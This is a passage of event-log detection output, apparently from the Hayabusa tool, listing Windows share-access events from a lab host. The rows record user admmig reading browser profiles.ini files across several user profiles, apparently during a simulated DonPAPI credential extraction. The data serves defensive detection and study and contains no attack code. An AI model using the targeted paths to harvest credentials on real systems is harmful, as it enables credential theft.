+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.932 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.968 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 